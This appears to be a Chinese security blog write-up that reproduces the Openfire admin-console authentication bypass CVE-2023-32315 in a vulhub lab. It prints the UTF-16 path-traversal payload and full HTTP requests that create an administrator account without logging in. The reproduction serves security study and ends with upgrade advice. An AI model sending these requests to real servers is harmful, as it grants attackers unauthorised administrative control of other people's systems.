CVE-2023-32315:Openfire身份认证绕过漏洞

admin 2024年5月17日23:07:50评论19 views字数 3483阅读11分36秒阅读模式

关注我们 ❤️,添加星标 🌟,一起学安全!
作者:Locks_@Timeline Sec
本文字数:1612
阅读时长:3~5min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

0x01 简介

Openfire 是根据开放源 Apache 许可获得许可的实时协作(RTC)服务器,它使用唯一被广泛采用的用于即时消息的开放协议 XMPP(也称为 Jabber)。

0x02 漏洞概述

漏洞编号:CVE-2023-32315

十多年前,Openfire 管理后台中曾被发现一处路径穿越漏洞,CVE-2008-6508。攻击者可以利用/setup/setup-/../../[page].jsp来绕过权限校验并访问任意后台页面。从那以后,Openfire 增加了对于路径穿越问题的防护策略,用以抵御这个漏洞。但是因为后来内置的 Web 服务器的升级,引入了对 UTF-16 字符支持的非标准 URL,而前面的防护策略并没有考虑到这一点。

在 Openfire 版本 4.7.4 和 4.6.7 及以前,Openfire 的 Web 管理后台存在一处目录穿越漏洞,这将允许攻击者绕过权限校验访问所有受限页面。

0x03 影响版本

3.10.0 <= Openfire < 4.6.8

4.7.0 <= Openfire 4.7.x < 4.7.5

0x04 环境搭建

vulhub

/vulhub-master/openfire/CVE-2023-32315

开启靶场

docker-compose up -d

访问 IP:9090 端口即可跳转到登录页面

CVE-2023-32315:Openfire身份认证绕过漏洞

0x05 漏洞复现

用此漏洞可当作确认绕过漏洞存在Openfire 敏感信息泄露

影响版本

3.10.0 <= Openfire <= 3.10.3
4.0.0 <= Openfire <= 4.0.4
4.1.0 <= Openfire <= 4.1.6
4.2.0 <= Openfire <= 4.2.4
4.3.0 <= Openfire <= 4.3.2
4.4.0 <= Openfire <= 4.4.4
4.5.0 <= Openfire <= 4.5.6
4.6.0 <= Openfire <= 4.6.7
4.7.0 <= Openfire <= 4.7.4

漏洞复现 payload:

/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp

请求包:

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
CVE-2023-32315:Openfire身份认证绕过漏洞
CVE-2023-32315:Openfire身份认证绕过漏洞

第一种方式:未授权

浏览器访问 URL 登录地址:

http://192.168.200.166:9090/login.jsp?url=%2Findex.jsp
CVE-2023-32315:Openfire身份认证绕过漏洞
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken&username=hackme&name=&email=&password=hackme&passwordConfirm=hackme&isadmin=on&create=Create+User HTTP/1.1
Host: 192.168.200.166:9090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: csrf=csrftoken

虽然这个请求的响应包中包含异常,但实际上新用户已经被创建,账号密码均为hackme

CVE-2023-32315:Openfire身份认证绕过漏洞

直接使用创建的新用户登录后台

CVE-2023-32315:Openfire身份认证绕过漏洞

如果上述方式未能成功执行 可尝试使用第二种方式

第二种方式获取令牌进行绕过

获得 JSESSIONID 和 csrftoken

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp HTTP/1.1
Host: 192.168.200.166:9090
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0


得到

Set-Cookie: JSESSIONID=node0bx4ar4xfrxg31dyngyxcw48un1.node0;

csrf=RVyqrnsveSPIFBl

CVE-2023-32315:Openfire身份认证绕过漏洞

进行伪造

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=RVyqrnsveSPIFBl&username=test123&name=&email=&password=test123&passwordConfirm=test123&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7 HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=node0bx4ar4xfrxg31dyngyxcw48un1.node0; csrf=RVyqrnsveSPIFBl
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0


CVE-2023-32315:Openfire身份认证绕过漏洞
CVE-2023-32315:Openfire身份认证绕过漏洞

0x06 修复方式

升级至最新版本:

https://github.com/igniterealtime/Openfire/releases

推荐服务

CVE-2023-32315:Openfire身份认证绕过漏洞

历史漏洞

CVE-2020-35202
CVE-2020-35201
CVE-2020-35199
CVE-2017-2815

后台功能

回复【1】领取新人学习资料
回复【
2】进入漏洞查询功能
回复【
3】获取加群方式
回复【
4】领取安全电子书籍

回复5】进入SRC-QQ交流群

商务合作

Timeline Sec团队可合作项目清单

原文始发于微信公众号(Timeline Sec):CVE-2023-32315:Openfire身份认证绕过漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月17日23:07:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-32315:Openfire身份认证绕过漏洞https://cn-sec.com/archives/2047435.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息